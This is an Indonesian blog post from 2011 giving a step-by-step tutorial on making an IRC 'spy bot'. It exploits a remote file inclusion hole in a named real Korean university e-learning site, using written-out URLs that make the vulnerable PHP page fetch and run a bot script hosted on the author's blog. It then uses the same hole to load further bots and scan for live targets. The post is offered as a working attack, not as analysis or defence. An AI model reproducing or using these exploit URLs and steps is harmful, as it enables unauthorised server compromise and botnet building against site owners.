Kamis, 13 Januari 2011

Cara Membuat Bot spy

Bot spy ini kegunaannya untuk menload bot-bot yang lain dan bisa juga di gunakan sebagai pencari target, kita hanya menjoinkan bot tersebut ke channel yang ada bot scannya. Bot ini cukup mudah membuatnya. caranya yaitu:
  1. Sediakan target yang masih hidup. contoh targetnya seperti ini: http://cmc-elearning.catholic.ac.kr/bbs/bbs//delete_comment.php?board_skin_path=
  2. Script bot spynya. dapat anda download disini
  3. edit script tersebut di bagian owner, pass, dan servernya, bisa juga nick-nick botnya di ganti sesuka anda.
  4. upload script spy.txt tersebut ke hosting anda. misal setelah diupload alamatnya: http://meidiyansyah.blogspot.com/spy.txt
  5. load bot spy tersebut dengan mozilla atau bot spy lain.dengan cara: http://cmc-elearning.catholic.ac.kr/bbs/bbs//delete_comment.php?board_skin_path=http://meidiyansyah.blogspot.com/spy.txt???
  6. Kalau botnya sudah masuk dia akan notice anda. lalu untuk loginnya: auth <pass>. misal seperti ini: auth cinta
  7. Untuk menload bot laen seperti: bot diam, bot spy, bot guard, bot ping, dll dengan menggunakan rumus: !tes + <target> + <url bot anda> + ??? ketik kan di channel. contohnya seperti ini: !tes http://cmc-elearning.catholic.ac.kr/bbs/bbs//delete_comment.php?board_skin_path=http://meidiyansyah.blogspot.com/ping.txt???
  8. apabila botnya masuk channel anda berarti targetnya hidup [ON].
demikian tutor bot spy.txt. semoga bermanfaat...

Tidak ada komentar:

Posting Komentar